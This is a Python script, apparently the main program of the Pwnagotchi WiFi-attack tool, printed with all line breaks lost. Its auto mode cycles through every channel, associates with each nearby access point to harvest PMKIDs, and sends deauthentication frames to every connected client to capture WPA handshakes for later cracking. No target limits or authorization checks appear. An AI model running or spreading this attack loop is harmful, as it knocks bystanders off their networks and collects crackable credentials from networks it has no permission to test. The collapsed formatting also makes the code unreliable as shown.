#!/usr/bin/python3 import logging import argparse import time import yaml import signal import pwnagotchi import pwnagotchi.grid as grid import pwnagotchi.utils as utils import pwnagotchi.plugins as plugins from pwnagotchi.identity import KeyPair from pwnagotchi.agent import Agent from pwnagotchi.ui.display import Display from pwnagotchi import restart def do_clear(display): logging.info("clearing the display ...") display.clear() exit(0) def do_manual_mode(agent): logging.info("entering manual mode ...") agent.mode = 'manual' agent.last_session.parse(agent.view(), args.skip_session) if not args.skip_session: logging.info( "the last session lasted %s (%d completed epochs, trained for %d), average reward:%s (min:%s max:%s)" % ( agent.last_session.duration_human, agent.last_session.epochs, agent.last_session.train_epochs, agent.last_session.avg_reward, agent.last_session.min_reward, agent.last_session.max_reward)) while True: display.on_manual_mode(agent.last_session) time.sleep(5) if grid.is_connected(): plugins.on('internet_available', agent) def do_auto_mode(agent): logging.info("entering auto mode ...") agent.mode = 'auto' agent.start() while True: try: # recon on all channels agent.recon() # get nearby access points grouped by channel channels = agent.get_access_points_by_channel() # for each channel for ch, aps in channels: agent.set_channel(ch) if not agent.is_stale() and agent.any_activity(): logging.info("%d access points on channel %d" % (len(aps), ch)) # for each ap on this channel for ap in aps: # send an association frame in order to get for a PMKID agent.associate(ap) # deauth all client stations in order to get a full handshake for sta in ap['clients']: agent.deauth(ap, sta) # An interesting effect of this: # # From Pwnagotchi's perspective, the more new access points # and / or client stations nearby, the longer one epoch of # its relative time will take ... basically, in Pwnagotchi's universe, # WiFi electromagnetic fields affect time like gravitational fields # affect ours ... neat ^_^ agent.next_epoch() if grid.is_connected(): plugins.on('internet_available', agent) except Exception as e: logging.exception("main loop exception") if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('-C', '--config', action='store', dest='config', default='/etc/pwnagotchi/default.yml', help='Main configuration file.') parser.add_argument('-U', '--user-config', action='store', dest='user_config', default='/etc/pwnagotchi/config.yml', help='If this file exists, configuration will be merged and this will override default values.') parser.add_argument('--manual', dest="do_manual", action="store_true", default=False, help="Manual mode.") parser.add_argument('--skip-session', dest="skip_session", action="store_true", default=False, help="Skip last session parsing in manual mode.") parser.add_argument('--clear', dest="do_clear", action="store_true", default=False, help="Clear the ePaper display and exit.") parser.add_argument('--debug', dest="debug", action="store_true", default=False, help="Enable debug logs.") parser.add_argument('--version', dest="version", action="store_true", default=False, help="Print the version.") parser.add_argument('--print-config', dest="print_config", action="store_true", default=False, help="Print the configuration.") args = parser.parse_args() if args.version: print(pwnagotchi.version) exit(0) config = utils.load_config(args) if args.print_config: print(yaml.dump(config, default_flow_style=False)) exit(0) utils.setup_logging(args, config) pwnagotchi.set_name(config['main']['name']) plugins.load(config) display = Display(config=config, state={'name': '%s>' % pwnagotchi.name()}) if args.do_clear: do_clear(display) exit(0) agent = Agent(view=display, config=config, keypair=KeyPair(view=display)) def usr1_handler(*unused): logging.info('Received USR1 singal. Restart process ...') restart("MANU" if args.do_manual else "AUTO") signal.signal(signal.SIGUSR1, usr1_handler) if args.do_manual: do_manual_mode(agent) else: do_auto_mode(agent)